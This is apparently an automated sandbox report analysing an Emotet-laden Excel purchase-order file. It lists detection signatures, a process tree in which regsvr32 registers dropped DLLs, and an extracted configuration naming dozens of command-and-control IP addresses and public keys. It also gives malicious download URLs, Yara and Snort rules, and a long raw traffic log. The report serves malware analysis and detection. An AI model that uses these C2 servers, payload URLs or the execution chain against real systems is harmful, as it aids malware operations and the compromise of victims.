Edit tour

Windows Analysis Report
PO0000001552.xls

Overview

General Information

Sample Name:	PO0000001552.xls
Analysis ID:	745091
MD5:	ecdc3f1e9afd2ce212a12ba3a844f521
SHA1:	0121ba555dfe0b42834759d201cce505bd619f86
SHA256:	1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Office process drops PE file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Drops files with a non-matching file extension (content does not match file extension)

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Registers a DLL

Drops PE files to the user directory

Found large amount of non-executed APIs

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64_ra

EXCEL.EXE (PID: 4380 cmdline: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls MD5: 23CAD504B3E04BB54CD636AD2874041A)

regsvr32.exe (PID: 6588 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6608 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6676 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll" MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6756 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 6792 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll" MD5: 578BAB56836A3FE455FFC7883041825B)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
PO0000001552.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x146aa:$s1: Excel 0x1573f:$s1: Excel 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x171c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2a90c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x24ac0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1b568:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x216e4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2ae01:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x24ad4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x175c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2ad0c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x24ec0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1b968:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x21ae4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2b201:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x24ed4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.regsvr32.exe.980000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.980000.0.unpack	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x169c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2a10c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x242c0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1ad68:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x20ee4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2a601:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x242d4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
8.2.regsvr32.exe.980000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.980000.0.raw.unpack	Windows_Trojan_Emotet_db7d33fa	unknown	unknown	0x175c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x2ad0c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3 0x24ec0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B 0x1b968:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3 0x21ae4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3 0x2b201:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3 0x24ed4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 9 - Source IP: 192.168.2.3 - Destination IP: 182.162.143.56

Timestamp:	192.168.2.3182.162.143.56497124432404316 11/13/22-19:28:07.391953
SID:	2404316
Source Port:	49712
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 18 - Source IP: 192.168.2.3 - Destination IP: 45.63.99.23

Timestamp:	192.168.2.345.63.99.234970970802404334 11/13/22-19:27:51.342965
SID:	2404334
Source Port:	49709
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.3 - Destination IP: 1.1.1.1

Timestamp:	192.168.2.31.1.1.163177532023883 11/13/22-19:27:02.730666
SID:	2023883
Source Port:	63177
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET CNC Feodo Tracker Reported CnC Server TCP group 8 - Source IP: 192.168.2.3 - Destination IP: 173.255.211.88

Timestamp:	192.168.2.3173.255.211.88497054432404314 11/13/22-19:27:33.992872
SID:	2404314
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PO0000001552.xls

Virustotal: Detection: 66%

Perma Link

Antivirus detection for URL or domain

Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/	Avira URL Cloud: Label: malware
Source: http://ly.yjlianyi.top/wp-admin/4cChao/	Avira URL Cloud: Label: malware
Source: http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/tkafmhcgcid/	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: sbm.xinmoshiwang.com	Virustotal: Detection: 13%	Perma Link
Source: datie-tw.com	Virustotal: Detection: 10%	Perma Link
Source: copunupo.ac.zm	Virustotal: Detection: 17%	Perma Link
Source: ly.yjlianyi.top	Virustotal: Detection: 13%	Perma Link

Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}

Source: unknown	HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\2yXcjy57oZTTUNweDidCGUY[1].dll	Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Source: global traffic	DNS query: name: datie-tw.com
Source: global traffic	DNS query: name: sbm.xinmoshiwang.com
Source: global traffic	DNS query: name: copunupo.ac.zm
Source: global traffic	DNS query: name: ly.yjlianyi.top

Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
